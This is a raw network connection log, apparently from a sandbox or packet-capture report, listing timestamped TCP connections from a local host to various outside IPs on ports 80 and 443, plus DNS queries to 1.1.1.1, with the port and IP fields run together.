                                                                                                                                                                                                              Nov 11, 2024 18:34:59.037713051 CET5010780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:34:59.037869930 CET5010680192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:00.100249052 CET5012180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:00.115864038 CET5012280192.168.2.864.190.63.136
                                                                                                                                                                                                              Nov 11, 2024 18:35:00.209810019 CET5011380192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:00.240835905 CET5010680192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:00.241097927 CET5010780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.387902975 CET5407280192.168.2.8178.162.203.202
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.392838001 CET8054072178.162.203.202192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.392977953 CET5407280192.168.2.8178.162.203.202
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.393389940 CET5407280192.168.2.8178.162.203.202
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.395010948 CET5407380192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.398721933 CET8054072178.162.203.202192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400366068 CET8054073162.255.119.102192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.400527000 CET5407380192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.401355982 CET5407380192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.409459114 CET8054073162.255.119.102192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.519946098 CET5772680192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.524867058 CET8057726188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.525660992 CET5772680192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.525770903 CET5772680192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.530596018 CET8057726188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.548266888 CET5772780192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.553242922 CET8057727199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.553469896 CET5772780192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.553469896 CET5772780192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.558378935 CET8057727199.59.243.227192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.568347931 CET5772880192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.573215008 CET805772844.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.574281931 CET5772880192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.574464083 CET5772880192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.579391956 CET805772844.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.594439030 CET5772980192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.596443892 CET5773080192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.599528074 CET5773180192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.599745989 CET8057729208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.599909067 CET5772980192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.599909067 CET5772980192.168.2.8208.100.26.245
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.600214005 CET5012280192.168.2.864.190.63.136
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.600215912 CET5012180192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.601339102 CET805773075.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.604418993 CET80577313.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.604486942 CET5773080192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.604489088 CET5773180192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.604660034 CET8057729208.100.26.245192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.604688883 CET5773080192.168.2.875.2.71.199
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.609539032 CET805773075.2.71.199192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.615839005 CET5011380192.168.2.891.195.240.19
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.647098064 CET5010780192.168.2.8162.255.119.102
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.673456907 CET5773180192.168.2.83.94.10.34
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.678364038 CET80577313.94.10.34192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.704564095 CET5010680192.168.2.8199.59.243.227
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.705698967 CET5773380192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.705703974 CET5773280192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.710624933 CET805773344.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.711054087 CET805773218.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.712261915 CET5773280192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.712263107 CET5773380192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.712440014 CET5773380192.168.2.844.221.84.105
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.712507010 CET5773280192.168.2.818.208.156.248
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.718445063 CET805773344.221.84.105192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.718863010 CET805773218.208.156.248192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.752336025 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.757359982 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:02.757606030 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028680086 CET44357738188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028692961 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028711081 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028775930 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.028786898 CET57738443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.031531096 CET5772680192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.031843901 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036673069 CET8057740188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036731958 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036906004 CET8057726188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036922932 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.036945105 CET5772680192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.041676044 CET8057740188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146245003 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146270990 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146281958 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146303892 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146326065 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146440029 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146451950 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146465063 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146502018 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146855116 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146864891 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146876097 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146888971 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146902084 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.146928072 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151741982 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151884079 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151937008 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.151994944 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.152036905 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227494001 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227528095 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227539062 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227576017 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227608919 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227807045 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227818966 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227847099 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.227861881 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228040934 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228090048 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228194952 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228207111 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228234053 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228255987 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228482962 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228493929 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228554964 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228703022 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228759050 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228885889 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228898048 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.228930950 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229151011 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229162931 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229203939 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229497910 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229537964 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229614973 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229625940 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229650974 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229682922 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229877949 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229891062 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.229921103 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230372906 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230489969 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230499983 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230501890 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230521917 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.230546951 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232413054 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232454062 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232518911 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.232557058 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.261358976 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.261454105 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.263849020 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.268652916 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308535099 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308563948 CET8057734199.191.50.83192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308593988 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.308618069 CET5773480192.168.2.8199.191.50.83
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.626763105 CET8057739154.212.231.82192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.626816034 CET5773980192.168.2.8154.212.231.82
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.732727051 CET8057740188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.732820988 CET5774080192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738413095 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738470078 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738537073 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738876104 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:05.738888025 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.169783115 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.169912100 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.175736904 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.175754070 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.175978899 CET44357741188.114.96.3192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.176085949 CET57741443192.168.2.8188.114.96.3
                                                                                                                                                                                                              Nov 11, 2024 18:35:06.176496029 CET57741443192.168.2.8188.114.96.3
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.061314106 CET5971153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.063124895 CET5936453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.064548969 CET6264453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.065979004 CET6306353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.067379951 CET6131553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.068813086 CET6233553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.070785999 CET5023853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.071459055 CET53568041.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.074877977 CET53626441.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.076472044 CET53630631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.076678991 CET53613151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.079356909 CET53623351.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.081998110 CET53502381.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.085299969 CET53501221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.086119890 CET5623953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.086119890 CET6210553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.086999893 CET5659553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.087753057 CET6117753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.090018034 CET53573991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.094412088 CET53593641.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.094424963 CET53621051.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.094434023 CET53565951.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.101707935 CET5205253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.101799011 CET6427853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.132994890 CET5021653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.133053064 CET6277853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.164566040 CET5402953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358254910 CET53611771.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358294010 CET53562391.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358465910 CET53626101.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358477116 CET53576781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358489990 CET53609461.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.358613968 CET53583301.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.363655090 CET53540291.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.371658087 CET53627781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.384623051 CET53642781.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.387573004 CET53520521.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404130936 CET5528453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404473066 CET5719153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404613018 CET5238453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.404822111 CET5282653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.406682968 CET5835153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.408971071 CET5649853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.411181927 CET53552841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.411432028 CET4982453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.412806988 CET53528261.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.416505098 CET53564981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.420104980 CET53583511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.431459904 CET5816253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.433712959 CET5832853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.433895111 CET5754053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434091091 CET5940653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434233904 CET5288953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434495926 CET53571911.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434511900 CET5789753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434776068 CET6435953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434776068 CET6180253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.434937954 CET5055153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435101986 CET4988553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435350895 CET53523841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435477018 CET6066753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.435838938 CET4961553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.436151028 CET6209653192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.436335087 CET5095553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.436502934 CET5765553192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.437369108 CET6497153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.437752962 CET5068453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.437869072 CET5831453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.440907955 CET5779853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441086054 CET5479953192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441355944 CET6045053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441723108 CET4925753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441747904 CET53502161.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.441812038 CET6217353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.443814039 CET53498241.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.444550037 CET53578971.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.444562912 CET53620961.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445066929 CET53643591.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445087910 CET53528891.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445099115 CET53575401.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.445921898 CET53618021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.446999073 CET53606671.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.447137117 CET53576551.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.448908091 CET53506841.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.452825069 CET53604501.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.454766989 CET53498851.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.456685066 CET53649711.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.463071108 CET53581621.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.466496944 CET53583281.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.467578888 CET53594061.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.468395948 CET53496151.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.469156981 CET53509551.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.469317913 CET53583141.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.473263979 CET53547991.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.473299026 CET53492571.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.642489910 CET53505511.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.659029961 CET53609631.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.914248943 CET6304353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.946527004 CET53630431.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:08.956923962 CET53597111.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.157422066 CET53577981.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.519001961 CET6217353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.652175903 CET53621731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:09.655107021 CET53621731.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.099944115 CET5632253192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.103959084 CET53562021.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.106781006 CET5870853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.107105017 CET5830053192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.107227087 CET53535201.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.109150887 CET53617001.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.111032963 CET53563221.1.1.1192.168.2.8
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.112060070 CET6439353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.113161087 CET4956753192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.114820957 CET6159853192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115004063 CET6261453192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115205050 CET5174353192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115684032 CET5673153192.168.2.81.1.1.1
                                                                                                                                                                                                              Nov 11, 2024 18:33:19.115828991 CET5713053192.168.2.81.1.1.1
